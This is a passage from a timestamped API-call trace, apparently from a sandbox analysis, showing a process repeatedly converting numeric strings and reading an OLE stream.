strIn="15630", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.464] atoi (_Str="1563") returned 1563 [0059.464] VarI4FromStr (in: strIn="146835686", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.465] atoi (_Str="8919") returned 8919 [0059.465] atoi (_Str="9") returned 9 [0059.465] VarI4FromStr (in: strIn="15630", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.465] atoi (_Str="1563") returned 1563 [0059.475] VarI4FromStr (in: strIn="1445915070", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.475] CRetailMalloc_Realloc () returned 0x888d558 [0059.475] atoi (_Str="532") returned 532 [0059.475] atoi (_Str="3") returned 3 [0059.476] atoi (_Str="1452") returned 1452 [0059.476] atoi (_Str="726") returned 726 [0059.476] VarI4FromStr (in: strIn="11723", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.478] atoi (_Str="2966") returned 2966 [0059.478] atoi (_Str="2960") returned 2960 [0059.479] atoi (_Str="1452") returned 1452 [0059.479] atoi (_Str="726") returned 726 [0059.479] VarI4FromStr (in: strIn="2076814382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.479] VarI4FromStr (in: strIn="26923", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.479] atoi (_Str="1417") returned 1417 [0059.480] VarI4FromStr (in: strIn="2076814382", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.480] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GsUvp7JY", cchCount1=-1, lpString2="v2fWnP", cchCount2=-1) returned 1 [0059.480] atoi (_Str="2966") returned 2966 [0059.481] atoi (_Str="2960") returned 2960 [0059.481] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GsUvp7JY", cchCount1=-1, lpString2="v2fWnP", cchCount2=-1) returned 1 [0059.481] atoi (_Str="1452") returned 1452 [0059.481] atoi (_Str="726") returned 726 [0059.481] VarR8FromStr (in: strIn="44352.916727181", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.481] VarR4FromR8 (in: dblIn=0x55d43db8, pfltOut=0x40e5a81d | out: pfltOut=0x40e5a81d) returned 0x0 [0059.482] atoi (_Str="2966") returned 2966 [0059.482] atoi (_Str="2960") returned 2960 [0059.482] atoi (_Str="1452") returned 1452 [0059.482] atoi (_Str="726") returned 726 [0059.482] VarR8FromStr (in: strIn="26538.811205879", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.482] VarR4FromR8 (in: dblIn=0xeacc1028, pfltOut=0x40d9eab3 | out: pfltOut=0x40d9eab3) returned 0x0 [0059.482] VarI4FromStr (in: strIn="26923", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.482] atoi (_Str="1417") returned 1417 [0059.483] atoi (_Str="26") returned 26 [0059.483] atoi (_Str="8") returned 8 [0059.483] atoi (_Str="4073") returned 4073 [0059.483] atoi (_Str="4067") returned 4067 [0059.483] atoi (_Str="159") returned 159 [0059.483] VarI4FromStr (in: strIn="10470", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.484] atoi (_Str="26") returned 26 [0059.484] atoi (_Str="8") returned 8 [0059.484] atoi (_Str="4073") returned 4073 [0059.484] atoi (_Str="4067") returned 4067 [0059.484] atoi (_Str="69") returned 69 [0059.484] atoi (_Str="1024") returned 1024 [0059.484] atoi (_Str="1045") returned 1045 [0059.485] VarR8FromStr (in: strIn="52119.964833682", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.485] VarR4FromR8 (in: dblIn=0xdfeae2c9, pfltOut=0x40e972fe | out: pfltOut=0x40e972fe) returned 0x0 [0059.485] atoi (_Str="25") returned 25 [0059.485] atoi (_Str="41") returned 41 [0059.486] atoi (_Str="4073") returned 4073 [0059.486] atoi (_Str="4067") returned 4067 [0059.486] VarR8FromStr (in: strIn="44422.177116315", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.486] VarR4FromR8 (in: dblIn=0xaaefd590, pfltOut=0x40e5b0c5 | out: pfltOut=0x40e5b0c5) returned 0x0 [0059.486] atoi (_Str="1024") returned 1024 [0059.486] atoi (_Str="1045") returned 1045 [0059.486] VarI4FromStr (in: strIn="22508", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.486] atoi (_Str="662") returned 662 [0059.487] atoi (_Str="25") returned 25 [0059.487] atoi (_Str="41") returned 41 [0059.487] atoi (_Str="4073") returned 4073 [0059.487] atoi (_Str="4067") returned 4067 [0059.487] VarI4FromStr (in: strIn="24067", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.487] atoi (_Str="1024") returned 1024 [0059.487] atoi (_Str="1045") returned 1045 [0059.488] VarI4FromStr (in: strIn="24067", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.488] VarI4FromStr (in: strIn="22508", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.488] atoi (_Str="662") returned 662 [0059.488] VarR8FromStr (in: strIn="45865.22059642", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.488] VarR4FromR8 (in: dblIn=0xf203930, pfltOut=0x40e66527 | out: pfltOut=0x40e66527) returned 0x0 [0059.488] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.488] atoi (_Str="0") returned 0 [0059.488] atoi (_Str="63") returned 63 [0059.489] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="YMVgU1py" | out: _Dst="YMVgU1py") returned 0x0 [0059.489] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="eYsBaNkC" | out: _Dst="eYsBaNkC") returned 0x0 [0059.489] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="Z4L5iBG0o" | out: _Dst="Z4L5iBG0o") returned 0x0 [0059.490] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.490] atoi (_Str="621") returned 621 [0059.490] atoi (_Str="32") returned 32 [0059.490] atoi (_Str="2091") returned 2091 [0059.490] atoi (_Str="2104") returned 2104 [0059.490] VarR8FromStr (in: strIn="9970.0678495456", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.490] VarR4FromR8 (in: dblIn=0xaf4b3db3, pfltOut=0x40c37908 | out: pfltOut=0x40c37908) returned 0x0 [0059.490] atoi (_Str="95") returned 95 [0059.490] atoi (_Str="5") returned 5 [0059.491] VarR8FromStr (in: strIn="14225.274550129", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.491] VarR4FromR8 (in: dblIn=0x24756895, pfltOut=0x40cbc8a3 | out: pfltOut=0x40cbc8a3) returned 0x0 [0059.491] atoi (_Str="1813") returned 1813 [0059.491] atoi (_Str="1796") returned 1796 [0059.492] atoi (_Str="2091") returned 2091 [0059.492] atoi (_Str="2104") returned 2104 [0059.492] VarI4FromStr (in: strIn="2052623168", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.492] atoi (_Str="95") returned 95 [0059.492] atoi (_Str="5") returned 5 [0059.492] VarI4FromStr (in: strIn="20526", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.492] VarI4FromStr (in: strIn="15252", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.492] atoi (_Str="246") returned 246 [0059.493] atoi (_Str="621") returned 621 [0059.493] atoi (_Str="32") returned 32 [0059.493] atoi (_Str="2091") returned 2091 [0059.493] atoi (_Str="2104") returned 2104 [0059.493] VarI4FromStr (in: strIn="62558596", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.493] atoi (_Str="1813") returned 1813 [0059.494] atoi (_Str="1796") returned 1796 [0059.494] atoi (_Str="2091") returned 2091 [0059.494] atoi (_Str="2104") returned 2104 [0059.494] VarR8FromStr (in: strIn="43780.607878537", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.494] VarR4FromR8 (in: dblIn=0x73bdb08b, pfltOut=0x40e56093 | out: pfltOut=0x40e56093) returned 0x0 [0059.494] atoi (_Str="95") returned 95 [0059.494] atoi (_Str="5") returned 5 [0059.494] atoi (_Str="9373") returned 9373 [0059.495] atoi (_Str="621") returned 621 [0059.495] atoi (_Str="32") returned 32 [0059.495] atoi (_Str="2091") returned 2091 [0059.495] atoi (_Str="2104") returned 2104 [0059.495] VarR8FromStr (in: strIn="50678.623018331", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.495] VarR4FromR8 (in: dblIn=0xefc4238f, pfltOut=0x40e8bed3 | out: pfltOut=0x40e8bed3) returned 0x0 [0059.495] atoi (_Str="95") returned 95 [0059.495] atoi (_Str="5") returned 5 [0059.496] CRetailMalloc_Realloc () returned 0x8890da0 [0059.497] atoi (_Str="45") returned 45 [0059.497] CRetailMalloc_Realloc () returned 0x8898da8 [0059.498] atoi (_Str="255") returned 255 [0059.498] atoi (_Str="180") returned 180 [0059.498] VarI4FromStr (in: strIn="10370", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.498] VarI4FromStr (in: strIn="10367", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.499] VarR8FromStr (in: strIn="54221.779499023", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.499] VarR4FromR8 (in: dblIn=0xf1a7ef62, pfltOut=0x40ea79b8 | out: pfltOut=0x40ea79b8) returned 0x0 [0059.499] atoi (_Str="1198") returned 1198 [0059.499] atoi (_Str="1176") returned 1176 [0059.499] VarR8FromStr (in: strIn="14669.753711324", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.499] VarR4FromR8 (in: dblIn=0x799cd79a, pfltOut=0x40cca6e0 | out: pfltOut=0x40cca6e0) returned 0x0 [0059.499] atoi (_Str="424") returned 424 [0059.499] atoi (_Str="481") returned 481 [0059.500] atoi (_Str="255") returned 255 [0059.500] atoi (_Str="180") returned 180 [0059.500] VarI4FromStr (in: strIn="10370", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.500] VarI4FromStr (in: strIn="10367", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.500] atoi (_Str="1198") returned 1198 [0059.500] atoi (_Str="1176") returned 1176 [0059.500] atoi (_Str="53") returned 53 [0059.501] atoi (_Str="424") returned 424 [0059.501] atoi (_Str="481") returned 481 [0059.501] VarI4FromStr (in: strIn="395694834", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.501] CExposedStream::Read () returned 0x0 [0059.501] CExposedStream::Read () returned 0x0 [0059.501] atoi (_Str="707") returned 707 [0059.501] atoi (_Str="1") returned 1 [0059.501] VarI4FromStr (in: strIn="10370", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.501] VarI4FromStr (in: strIn="10367", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.501] VarR8FromStr (in: strIn="8589.7250135194", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.501] VarR4FromR8 (in: dblIn=0xcd3e357e, pfltOut=0x40c0c6dc | out: pfltOut=0x40c0c6dc) returned 0x0 [0059.501] atoi (_Str="1198") returned 1198 [0059.502] atoi (_Str="1176") returned 1176 [0059.502] VarI4FromStr (in: strIn="20837", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.502] VarR8FromStr (in: strIn="61770.159854677", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.502] VarR4FromR8 (in: dblIn=0x1d878e3a, pfltOut=0x40ee2945 | out: pfltOut=0x40ee2945) returned 0x0 [0059.502] atoi (_Str="121") returned 121 [0059.502] atoi (_Str="208") returned 208 [0059.502] VarI4FromStr (in: strIn="26510", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.502] atoi (_Str="5302") returned 5302 [0059.502] VarI4FromStr (in: strIn="15447", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.502] atoi (_Str="598") returned 598 [0059.502] atoi (_Str="40") returned 40 [0059.503] VarI4FromStr (in: strIn="26510", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.503] atoi (_Str="5302") returned 5302 [0059.503] atoi (_Str="598") returned 598 [0059.503] atoi (_Str="40") returned 40 [0059.503] VarI4FromStr (in: strIn="26510", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.503] atoi (_Str="5302") returned 5302 [0059.503] VarI4FromStr (in: strIn="697751216", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.503] VarI4FromStr (in: strIn="15910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.503] atoi (_Str="121") returned 121 [0059.503] atoi (_Str="208") returned 208 [0059.503] VarI4FromStr (in: strIn="26510", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.504] atoi (_Str="5302") returned 5302 [0059.504] atoi (_Str="94") returned 94 [0059.504] atoi (_Str="3973") returned 3973 [0059.504] atoi (_Str="137") returned 137 [0059.504] VarI4FromStr (in: strIn="21380", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.504] atoi (_Str="2138") returned 2138 [0059.504] atoi (_Str="190") returned 190 [0059.504] atoi (_Str="1234") returned 1234 [0059.504] atoi (_Str="1207") returned 1207 [0059.504] VarR8FromStr (in: strIn="43761.473831603", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.504] VarR4FromR8 (in: dblIn=0x29a0e4d6, pfltOut=0x40e55e2f | out: pfltOut=0x40e55e2f) returned 0x0 [0059.504] atoi (_Str="515") returned 515 [0059.504] atoi (_Str="572") returned 572 [0059.505] VarR8FromStr (in: strIn="57936.192312828", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.505] VarR4FromR8 (in: dblIn=0x276d3b5c, pfltOut=0x40ec4a06 | out: pfltOut=0x40ec4a06) returned 0x0 [0059.505] atoi (_Str="628") returned 628 [0059.505] atoi (_Str="8") returned 8 [0059.505] VarI4FromStr (in: strIn="21380", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.505] atoi (_Str="2138") returned 2138 [0059.505] atoi (_Str="3973") returned 3973 [0059.505] atoi (_Str="137") returned 137 [0059.505] VarI4FromStr (in: strIn="21380", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.505] atoi (_Str="2138") returned 2138 [0059.505] atoi (_Str="1234") returned 1234 [0059.505] atoi (_Str="1207") returned 1207 [0059.505] atoi (_Str="94") returned 94 [0059.506] atoi (_Str="3973") returned 3973 [0059.506] atoi (_Str="137") returned 137 [0059.506] VarI4FromStr (in: strIn="21380", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.506] atoi (_Str="2138") returned 2138 [0059.506] atoi (_Str="1234") returned 1234 [0059.506] atoi (_Str="1207") returned 1207 [0059.506] VarR8FromStr (in: strIn="36874.122347742", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.506] VarR4FromR8 (in: dblIn=0xea45cfd4, pfltOut=0x40e20143 | out: pfltOut=0x40e20143) returned 0x0 [0059.506] atoi (_Str="515") returned 515 [0059.506] atoi (_Str="572") returned 572 [0059.506] atoi (_Str="67") returned 67 [0059.506] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="N2TQdxs" | out: _Dst="N2TQdxs") returned 0x0 [0059.506] atoi (_Str="4082") returned 4082 [0059.507] atoi (_Str="4083") returned 4083 [0059.507] atoi (_Str="583") returned 583 [0059.507] atoi (_Str="573") returned 573 [0059.507] VarR8FromStr (in: strIn="24691.690018285", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.507] VarR4FromR8 (in: dblIn=0x294273ee, pfltOut=0x40d81cec | out: pfltOut=0x40d81cec) returned 0x0 [0059.507] atoi (_Str="1113") returned 1113 [0059.507] atoi (_Str="1130") returned 1130 [0059.507] atoi (_Str="141") returned 141 [0059.507] atoi (_Str="104") returned 104 [0059.507] VarR8FromStr (in: strIn="19890.686302784", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.507] VarR4FromR8 (in: dblIn=0xec62831c, pfltOut=0x40d36cab | out: pfltOut=0x40d36cab) returned 0x0 [0059.507] atoi (_Str="723") returned 723 [0059.507] atoi (_Str="10") returned 10 [0059.507] atoi (_Str="583") returned 583 [0059.508] atoi (_Str="573") returned 573 [0059.508] VarR8FromStr (in: strIn="42305.151592575", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.508] VarR4FromR8 (in: dblIn=0xd9d8abfe, pfltOut=0x40e4a824 | out: pfltOut=0x40e4a824) returned 0x0 [0059.508] CRetailMalloc_Realloc () returned 0x8898da8 [0059.508] VarI4FromStr (in: strIn="27531", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.508] atoi (_Str="4082") returned 4082 [0059.508] atoi (_Str="4083") returned 4083 [0059.508] atoi (_Str="583") returned 583 [0059.508] atoi (_Str="573") returned 573 [0059.508] atoi (_Str="1113") returned 1113 [0059.508] atoi (_Str="1130") returned 1130 [0059.508] atoi (_Str="0") returned 0 [0059.508] atoi (_Str="4082") returned 4082 [0059.508] atoi (_Str="4083") returned 4083 [0059.509] atoi (_Str="583") returned 583 [0059.509] atoi (_Str="573") returned 573 [0059.509] VarR8FromStr (in: strIn="51118.982277679", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.509] VarR4FromR8 (in: dblIn=0x6ed1995d, pfltOut=0x40e8f5df | out: pfltOut=0x40e8f5df) returned 0x0 [0059.509] CRetailMalloc_Realloc () returned 0x8769778 [0059.510] atoi (_Str="4420") returned 4420 [0059.510] atoi (_Str="221") returned 221 [0059.510] atoi (_Str="4300") returned 4300 [0059.510] atoi (_Str="4299") returned 4299 [0059.510] VarI4FromStr (in: strIn="1545872960", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.510] atoi (_Str="118") returned 118 [0059.510] atoi (_Str="150") returned 150 [0059.511] VarI4FromStr (in: strIn="1545872960", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.511] atoi (_Str="367") returned 367 [0059.511] atoi (_Str="430") returned 430 [0059.511] VarI4FromStr (in: strIn="1545872960", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.511] atoi (_Str="801") returned 801 [0059.511] atoi (_Str="17") returned 17 [0059.514] atoi (_Str="4300") returned 4300 [0059.514] atoi (_Str="4299") returned 4299 [0059.514] VarR8FromStr (in: strIn="42482.563929334", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.514] VarR4FromR8 (in: dblIn=0xbb587d9, pfltOut=0x40e4be52 | out: pfltOut=0x40e4be52) returned 0x0 [0059.514] atoi (_Str="4420") returned 4420 [0059.514] atoi (_Str="221") returned 221 [0059.514] atoi (_Str="4300") returned 4300 [0059.514] atoi (_Str="4299") returned 4299 [0059.514] VarR8FromStr (in: strIn="53637.955628019", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.514] VarR4FromR8 (in: dblIn=0x94813618, pfltOut=0x40ea30be | out: pfltOut=0x40ea30be) returned 0x0 [0059.514] atoi (_Str="118") returned 118 [0059.515] atoi (_Str="150") returned 150 [0059.515] VarI4FromStr (in: strIn="13519", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.515] atoi (_Str="367") returned 367 [0059.515] atoi (_Str="430") returned 430 [0059.515] VarI4FromStr (in: strIn="26108", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.515] atoi (_Str="428") returned 428 [0059.515] atoi (_Str="2356") returned 2356 [0059.515] atoi (_Str="2347") returned 2347 [0059.515] atoi (_Str="734") returned 734 [0059.515] atoi (_Str="757") returned 757 [0059.515] atoi (_Str="253") returned 253 [0059.515] VarI4FromStr (in: strIn="22020", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.515] atoi (_Str="367") returned 367 [0059.516] VarR8FromStr (in: strIn="1705.6555536418", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.516] VarR4FromR8 (in: dblIn=0x49743138, pfltOut=0x409aa69f | out: pfltOut=0x409aa69f) returned 0x0 [0059.516] atoi (_Str="701") returned 701 [0059.516] atoi (_Str="13") returned 13 [0059.516] atoi (_Str="2356") returned 2356 [0059.516] atoi (_Str="2347") returned 2347 [0059.516] atoi (_Str="199") returned 199 [0059.516] atoi (_Str="734") returned 734 [0059.516] atoi (_Str="757") returned 757 [0059.516] VarR8FromStr (in: strIn="27970.952355708", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.516] VarR4FromR8 (in: dblIn=0xf3655b01, pfltOut=0x40db50bc | out: pfltOut=0x40db50bc) returned 0x0 [0059.516] atoi (_Str="199") returned 199 [0059.516] atoi (_Str="701") returned 701 [0059.516] atoi (_Str="13") returned 13 [0059.517] VarR8FromStr (in: strIn="48215.991278071", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.517] VarR4FromR8 (in: dblIn=0xb88cca06, pfltOut=0x40e78aff | out: pfltOut=0x40e78aff) returned 0x0 [0059.517] VarI4FromStr (in: strIn="26108", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.517] VarI4FromStr (in: strIn="22020", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.517] VarR8FromStr (in: strIn="21996.917099589", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.517] VarR4FromR8 (in: dblIn=0xb1c2797c, pfltOut=0x40d57b3a | out: pfltOut=0x40d57b3a) returned 0x0 [0059.517] VarI4FromStr (in: strIn="10847", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.517] VarI4FromStr (in: strIn="26108", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.517] VarI4FromStr (in: strIn="29160", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.517] CRetailMalloc_Realloc () returned 0x88863e0 [0059.518] VarR8FromStr (in: strIn="38380.135815969", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.518] VarR4FromR8 (in: dblIn=0x589abb24, pfltOut=0x40e2bd84 | out: pfltOut=0x40e2bd84) returned 0x0 [0059.518] VarI4FromStr (in: strIn="29160", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.518] VarR8FromStr (in: strIn="38380.135815969", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.518] VarR4FromR8 (in: dblIn=0x589abb24, pfltOut=0x40e2bd84 | out: pfltOut=0x40e2bd84) returned 0x0 [0059.518] VarI4FromStr (in: strIn="12364", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.518] VarR8FromStr (in: strIn="19406.05922406", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.518] VarR4FromR8 (in: dblIn=0xca53b636, pfltOut=0x40d2f383 | out: pfltOut=0x40d2f383) returned 0x0 [0059.518] VarI4FromStr (in: strIn="17613", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.518] VarR8FromStr (in: strIn="28729.329964435", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.518] VarR4FromR8 (in: dblIn=0x1e23264b, pfltOut=0x40dc0e55 | out: pfltOut=0x40dc0e55) returned 0x0 [0059.518] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="S4LYP5kj" | out: _Dst="S4LYP5kj") returned 0x0 [0059.520] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="lChar" | out: _Dst="lChar") returned 0x0 [0059.520] VarI4FromStr (in: strIn="176848848", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.520] VarR8FromStr (in: strIn="4568.5230188945", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.520] VarR4FromR8 (in: dblIn=0xe490f711, pfltOut=0x40b1d885 | out: pfltOut=0x40b1d885) returned 0x0 [0059.520] CExposedStream::Read () returned 0x0 [0059.520] CExposedStream::Read () returned 0x0 [0059.521] VarI4FromStr (in: strIn="14883", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.521] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Dir$", cchCount1=-1, lpString2="JaIXG", cchCount2=-1) returned 1 [0059.521] VarR8FromStr (in: strIn="25445.978394864", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.521] VarR4FromR8 (in: dblIn=0x9e057ddd, pfltOut=0x40d8d97e | out: pfltOut=0x40d8d97e) returned 0x0 [0059.521] VarI4FromStr (in: strIn="14883", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.521] VarI4FromStr (in: strIn="31292", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.521] VarI4FromStr (in: strIn="17696", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.521] VarI4FromStr (in: strIn="22496", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.521] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="UFbuL" | out: _Dst="UFbuL") returned 0x0 [0059.522] VarI4FromStr (in: strIn="26940", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.522] VarR8FromStr (in: strIn="43532.430628441", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.522] VarR4FromR8 (in: dblIn=0xc7b54bda, pfltOut=0x40e5418d | out: 